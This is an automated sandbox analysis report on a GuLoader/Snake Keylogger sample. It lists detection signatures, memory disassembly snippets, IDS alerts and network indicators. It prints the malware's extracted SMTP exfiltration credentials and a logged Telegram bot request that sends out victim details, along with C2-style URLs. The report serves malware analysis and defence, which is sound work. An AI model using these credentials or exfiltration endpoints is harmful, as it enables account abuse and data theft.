Windows Analysis Report
________.exe

Overview

General Information

Sample name: ________.exe
Analysis ID: 1554160
MD5: 89b3b4723ea3983fc0f103eaf3093edc
SHA1: bb6fb38b57fd6694e0803d1de469f0a326e231f4
SHA256: 69a0042174fbffed7ac840081ec1d5618f2a70fe4d56078b98a1db06627f9eab
Tags: exe, user-abuse_ch

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ________.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\________.exe" MD5: 89B3B4723EA3983FC0F103EAF3093EDC)
    • ________.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\________.exe" MD5: 89B3B4723EA3983FC0F103EAF3093EDC)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Malware configuration (Snake Keylogger): {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
Yara matches:
Source | Rule | Description | Author
00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.1623677806.000000000330D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: ________.exe PID: 2916 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
Process Memory Space: ________.exe PID: 5916 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\________.exe", CommandLine: "C:\Users\user\Desktop\________.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\________.exe, NewProcessName: C:\Users\user\Desktop\________.exe, OriginalFileName: C:\Users\user\Desktop\________.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\________.exe", ProcessId: 2916, ProcessName: ________.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 37.27.123.72, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\________.exe, Initiated: true, ProcessId: 5916, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49731

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T07:36:32.879752+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-12T07:37:12.770892+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.8 | 49732 | TCP
2024-11-12T07:36:50.311923+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49717 | 188.114.96.3 | 443 | TCP
2024-11-12T07:36:52.391719+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49719 | 188.114.96.3 | 443 | TCP
2024-11-12T07:36:47.682495+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:48.280641+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:49.593155+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49715 | 193.122.130.0 | 80 | TCP
2024-11-12T07:36:51.686922+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49718 | 193.122.130.0 | 80 | TCP


AV Detection

Source: ________.exe | Avira: detected
Source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
Source: ________.exe | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35E986C4 CryptUnprotectData | 3_2_35E986C4
Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_35E98EF1 CryptUnprotectData | 3_2_35E98EF1
Source: ________.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 1_2_00405772
Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_0040622D FindFirstFileW,FindClose | 1_2_0040622D
Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_00402770 FindFirstFileW | 1_2_00402770
Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_00402770 FindFirstFileW | 3_2_00402770
Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 3_2_00405772
Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_0040622D FindFirstFileW,FindClose | 3_2_0040622D
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 0015F2EDh | 3_2_0015F150
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 0015F2EDh | 3_2_0015F33C
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 0015F2EDh | 3_2_0015F3B8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 0015FAA9h | 3_2_0015F804
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4E311h | 3_2_32D4E068
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D431E8h | 3_2_32D42DD0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D42C21h | 3_2_32D42970
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4FD21h | 3_2_32D4FA78
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4F8C9h | 3_2_32D4F620
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4DA61h | 3_2_32D4D7B8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4D609h | 3_2_32D4D360
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4D1B1h | 3_2_32D4CF08
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D40D0Dh | 3_2_32D40B30
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D41697h | 3_2_32D40B30
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4E769h | 3_2_32D4E4C0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 3_2_32D40040
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4DEB9h | 3_2_32D4DC10
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D431E8h | 3_2_32D42DC3
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4F471h | 3_2_32D4F1C8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4F019h | 3_2_32D4ED70
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D431E8h | 3_2_32D43116
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 32D4EBC1h | 3_2_32D4E918
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E99280h | 3_2_35E98FB0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E97EB5h | 3_2_35E97B78
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E902E9h | 3_2_35E90040
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9C8B6h | 3_2_35E9C5E8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E918A1h | 3_2_35E915F8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E95E81h | 3_2_35E95BD8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9E8A6h | 3_2_35E9E5D8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9B676h | 3_2_35E9B3A8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E91449h | 3_2_35E911A0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E92E59h | 3_2_35E92BB0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9F656h | 3_2_35E9F388
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E95A29h | 3_2_35E95780
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9D666h | 3_2_35E9D398
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9E416h | 3_2_35E9E148
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E90FF1h | 3_2_35E90D48
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9C426h | 3_2_35E9C158
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E92A01h | 3_2_35E92758
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E955D1h | 3_2_35E95328
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E979C9h | 3_2_35E97720
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9D1D6h | 3_2_35E9CF08
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E925A9h | 3_2_35E92300
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9B1E6h | 3_2_35E9AF18
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9F1C6h | 3_2_35E9EEF8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E90B99h | 3_2_35E908F0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9BF96h | 3_2_35E9BCC8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E97571h | 3_2_35E972C8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E95179h | 3_2_35E94ED0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E92151h | 3_2_35E91EA8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9DF86h | 3_2_35E9DCB8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then mov esp, ebp | 3_2_35E9ACBC
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E96733h | 3_2_35E96488
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E932B1h | 3_2_35E9308D
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E90741h | 3_2_35E90498
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9ED36h | 3_2_35E9EA68
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E93709h | 3_2_35E93460
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9CD46h | 3_2_35E9CA78
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E94D21h | 3_2_35E94A78
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E97119h | 3_2_35E96E70
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E91CF9h | 3_2_35E91A50
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9DAF6h | 3_2_35E9D828
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E948C9h | 3_2_35E94620
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9BB06h | 3_2_35E9B838
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E962D9h | 3_2_35E96030
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E96CC1h | 3_2_35E96A18
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35E9FAE6h | 3_2_35E9F818
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F064E0h | 3_2_35F061E8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F05EB7h | 3_2_35F05B48
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F03506h | 3_2_35F03238
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F010BEh | 3_2_35F00DF0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F08FE8h | 3_2_35F08CF0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F022C6h | 3_2_35F01FF8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0BAF0h | 3_2_35F0B7F8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0D2D8h | 3_2_35F0CFE0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F042B6h | 3_2_35F03FE8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0FDE0h | 3_2_35F0FAE8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0079Eh | 3_2_35F004D0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F07CC8h | 3_2_35F079D0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0A7D0h | 3_2_35F0A4D8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0BFB8h | 3_2_35F0BCC0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F03996h | 3_2_35F036C8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0EAC0h | 3_2_35F0E7C8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F069A8h | 3_2_35F066B0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F05986h | 3_2_35F056B8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F094B0h | 3_2_35F091B8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0AC98h | 3_2_35F0A9A0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F03076h | 3_2_35F02DA8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0D7A0h | 3_2_35F0D4A8
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0EF88h | 3_2_35F0EC90
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F05066h | 3_2_35F04D98
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F08190h | 3_2_35F07E98
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0154Eh | 3_2_35F01280
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F09978h | 3_2_35F09680
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F02756h | 3_2_35F02488
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0C480h | 3_2_35F0C188
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0DC68h | 3_2_35F0D970
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F04747h | 3_2_35F04478
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F06E70h | 3_2_35F06B78
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F00C2Eh | 3_2_35F00960
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F08658h | 3_2_35F08360
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F01E36h | 3_2_35F01B68
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0B160h | 3_2_35F0AE68
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0C948h | 3_2_35F0C650
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F03E26h | 3_2_35F03B58
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0F450h | 3_2_35F0F158
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0030Eh | 3_2_35F00040
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F07338h | 3_2_35F07040
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F09E40h | 3_2_35F09B48
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0B628h | 3_2_35F0B330
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0E130h | 3_2_35F0DE38
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0F918h | 3_2_35F0F620
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F054F6h | 3_2_35F05228
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F08B20h | 3_2_35F08828
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F019B7h | 3_2_35F01710
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0A308h | 3_2_35F0A010
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F02BE6h | 3_2_35F02918
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0CE10h | 3_2_35F0CB18
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F0E5F8h | 3_2_35F0E300
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F04BD6h | 3_2_35F04908
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F07800h | 3_2_35F07508
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F31B20h | 3_2_35F31828
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F30CC8h | 3_2_35F309D0
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F31658h | 3_2_35F31360
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F30800h | 3_2_35F30508
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F31190h | 3_2_35F30E98
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then jmp 35F30339h | 3_2_35F30040
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_360B3E70
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_360B3E60
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_360B0D26
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_360B0A10
Source: C:\Users\user\Desktop\________.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 3_2_360B09E1

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.8:49731 -> 37.27.123.72:587
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49718 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49715 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49706
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49732
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49716 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.onedrive.com
Source: global traffic | DNS traffic detected: DNS query: fa2ytg.dm.files.1drv.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: mail.foodex.com.pk
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 12 Nov 2024 06:37:04 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: ________.exe, 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: ________.exe, 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: ________.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
